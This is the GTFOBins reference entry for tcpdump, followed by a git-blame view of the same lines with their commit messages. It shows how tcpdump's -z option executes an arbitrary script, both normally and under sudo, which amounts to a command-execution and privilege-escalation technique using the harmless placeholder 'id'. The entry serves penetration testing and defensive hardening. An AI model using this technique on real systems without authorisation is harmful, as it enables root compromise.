GTFOBins.github.io/_gtfobins/tcpdump.md

---
description: These require some traffic to be actually captured. Also note that the subprocess is immediately sent to the background.
functions:
  command:
    - code: |
        COMMAND='id'
        TF=$(mktemp)
        echo "$COMMAND" > $TF
        chmod +x $TF
        tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
  sudo:
    - code: |
        COMMAND='id'
        TF=$(mktemp)
        echo "$COMMAND" > $TF
        chmod +x $TF
        sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
---
add new ways 2018-08-17 15:16:09 +00:00			`---`
Clarify tcpdump subprocess 2018-09-07 11:01:23 +00:00			`description: These require some traffic to be actually captured. Also note that the subprocess is immediately sent to the background.`
add new ways 2018-08-17 15:16:09 +00:00			`functions:`
Adopt new function names 2018-10-05 17:55:38 +00:00			`command:`
Fix and simplify tcpdump 2018-08-19 08:31:04 +00:00			`- code: \|`
Avoid output file for tcpdump 2018-09-06 22:29:58 +00:00			`COMMAND='id'`
Standardize tcpdump temporary file creation 2018-08-19 10:24:13 +00:00			`TF=$(mktemp)`
Fix and simplify tcpdump 2018-08-19 08:31:04 +00:00			`echo "$COMMAND" > $TF`
			`chmod +x $TF`
			`tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF`
Adopt new function names 2018-10-05 17:55:38 +00:00			`sudo:`
Fix and simplify tcpdump 2018-08-19 08:31:04 +00:00			`- code: \|`
Avoid output file for tcpdump 2018-09-06 22:29:58 +00:00			`COMMAND='id'`
Standardize tcpdump temporary file creation 2018-08-19 10:24:13 +00:00			`TF=$(mktemp)`
Fix and simplify tcpdump 2018-08-19 08:31:04 +00:00			`echo "$COMMAND" > $TF`
			`chmod +x $TF`
			`sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF`
add new ways 2018-08-17 15:16:09 +00:00			`---`